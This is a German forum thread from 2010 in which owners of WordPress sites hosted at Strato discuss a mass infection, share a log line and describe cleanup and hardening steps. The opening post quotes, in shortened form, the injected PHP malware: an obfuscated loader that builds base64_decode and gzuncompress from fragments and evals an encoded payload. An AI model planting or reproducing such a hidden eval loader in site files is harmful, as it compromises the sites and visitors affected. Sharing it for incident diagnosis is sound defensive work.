Virus bei strato gehosteter WP Site

  • Am 24.10. wurden bei einer wordpress Site folgende Zeilen an den Anfang der page.php und tag.php eingefügt (stark gekürzt ).

    PHP
    <?php $linedup = array("4_decode","base6"); $grep_ = array("gzunco","mpress") ; $stips = array('eNp1WWtv4','koS/Sv','3w0gzo1ztNTZ','kbF3lQ0jAQIAQQ4zt1WrlB2','DABm','cI+LHa/77','dp9ptk','pmVItNu96PqV','NWp6s76fAjft8fDH9Eq/PZl','+/0/','X/y7+58//','fLb169','/fg2+/vGPr+a','UP4+BQ7+h089DM8nclL+e7t','gwb8','mbRrna3N3','Vsxz+6','FYBdfGXcNDnP','wfX6f4M1E4ZaiMlUqeHesbg','WI90','8rvfNCMtP','nmHEW8','WvmmXvBGoxdl','TrV2oTn+GmzveVQ/3NLviv/','4BYv','PuUOXNTKv','X7hch/', 
    .... 
    /vAwHIlwu1G','eSQy','fvQ9s0joJ','Xrdq6H','JKMJ/zUaSj9r','L+gHTp56wsyU0O1qUv6PrA9','N/Ey','Nlk7HZR10','1sJj3X','hiS9MBWAobUX','nJ6I4nnhBbWhd6r8QMQE0H4','+YuH','whYuJpL2L','iOir3v','mhI9AcNndJbC','ZKcDm/NKOFKE4ZOntxEDE7y','kRIU','cXW7UrsP2','3kXmsb','QWn8fOo+87eY','iBeN2rLT5sLRnTDuGTqTO0K','n8f+','e1joVz8Dh','frNf47','ZndH0P7p2UHZ','rnsfnTjPr6x1qsLv4Y2bZlJ','gu5z','3D4bZ1flm','atDCX/','UitHEW6ikjyi','SYQOlkvSoufSth4xoZ0KPrm','Evst','HO20iCQR/','Tg6P71','GTob8V/+zb3r','5TQ+D9jg5yJ'); $black = $linedup[1].$linedup[0]; eval($blue($black(implode("", $stips))));  eval($blue($black(implode("", $white)))); ?>

    Die Seite wurde dadurch erstmal lahm gelegt (u.a. betrug das memory limit nur noch 16MB). Laut strato waren eine Reihe weiterer Wordpress Seiten betroffen.
    Hat jemand Infos dazu oder weiss, ob diese Sicherheitslücke nur bei Strato auftrat oder auch anderswo?
    Die Dateien hatten nur Schreibrechte für den Besitzer CHMOD 644)

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • welche wordpress version, welches theme und welche plugins verwendest du? ein paar basisdaten wären schon nicht schlecht um dir zu helfen ;)

    Digitaler Rucksack Nomade

  • Strato schreibt dazu:

    Zitat

    Aufgrund der plötzlichen und massenhaft auftretenden Probleme mit WordPress-Installationen seit dem letzten Wochenende (23.10./24.10.2010) wurde durch unser Rechenzentrum eine Analyse der betroffenen Webseiten vorgenommen.

    Dabei haben die Kollegen festgestellt, dass durch eine scheinbar auch in der aktuellsten WordPress-Version existierende Sicherheitslücke in Verbindung mit der Datei "wp-admin/theme-editor.php" gleich reihenweise Webseiten mit Schadcode infiziert wurden. Dieser sorgt letztlich für die Verringerung des für WordPress zur Verfügung stehenden Speichers.

    Bei strato kann man Themes über den Theme editor bearbeiten.
    Bei all-inkl geht das nur, wenn man der Theme Datei die Schreibrechte 666 gibt. Gibt es dazu eine Servereinstellung, dass man das bei strato auch so einrichten kann, dass Themedateien erst dann beschreibbar sind, wenn man sie mit Schreibrechten versieht?

    Einmal editiert, zuletzt von bluecafe (26. Oktober 2010 um 19:09)

  • ... Gibt es dazu eine Servereinstellung, dass man das bei strato auch so einrichten kann, dass Themedateien erst dann beschreibbar sind, wenn man sie mit Schreibrechten versieht?


    Klar, alle Schreibrechte entziehen, also Rechte für Dateien auf 444 oder 440 stellen.

    Gruß
    Ingo

    Wenn ich helfen konnte, bitte [ Gefällt mir ] klicken. :-)

  • mhh,.. hab mir das Logfile noch mal angesehen,.. macht einfach einen .htaccess Schutz für den Ordner /wp-admin/ rein.

    Bei mir begann der Einbruch überso:

    [23/Oct/2010:10:31:15 +0200] "GET /wp-login.php HTTP/1.1" 200 2969 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10"

    Innerhalb von 1 Minute wurden meine 3 von mir zu letzt bearbeiteten Dateien verändert.

    Gruß blue-matrix

  • bluecafe: Wie hast du denn deine Seite wieder zum Laufen gebracht? Ich habe Backups eingespielt aber nichts regt sich. Musste Strato irgendwas wieder freigeben da sie mir geschrieben haben sie hätten durch den Hack die Website kurzfristig geblockt?

    Nutzt du übrigens WP Sitemap Generator Plugin? Bei mir kam der Hack kurz nach der Installation, kann aber natürlich auch Zufall sein..

  • sorry funktioniert wieder, hatte die durch den Hack angelegten Nutzer gelöscht, PW geändert, den kompletten Serverinhalt gelöscht, Datenbank überprüft (soweit erstmal nichts auffälliges) und Inhalte neu eingespielt, nun läuft es wieder.

  • hallo

    ich hab auch einen Blog (Blogpro) bei Strato...

    kommt bei euch es auch öfters vor das der Server lahm wird und auch mal "Internal Server Error"?

    Hab da bei Strato schon angerufen, die meinten nur das die diese Angelegenheit and die Technicker weiterleiten.

    Hab bis heute mind. 1-2 "Internal Server Error" für ca. 5min

    Die Mammuthanull Webseite: Supa Somsak, SEO, Lokomotiven (Mammut H0 Lok) Google Contest

  • schreib dem support das du umgehend einen umzug auf einen anderen server wünscht, da deine hostnode wohl überlastet ist. am besten sehr direkt schreiben, der support von strato reagiert nicht auf liebe bitten ;)

    Digitaler Rucksack Nomade

  • Danke michi...

    das müsste dann mein Freund machen... ihm gehört ja die Domain und Webspace. Hoffentlich kriegt er das hin xD

    Aber vielen Dank für die Info

    Die Mammuthanull Webseite: Supa Somsak, SEO, Lokomotiven (Mammut H0 Lok) Google Contest

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!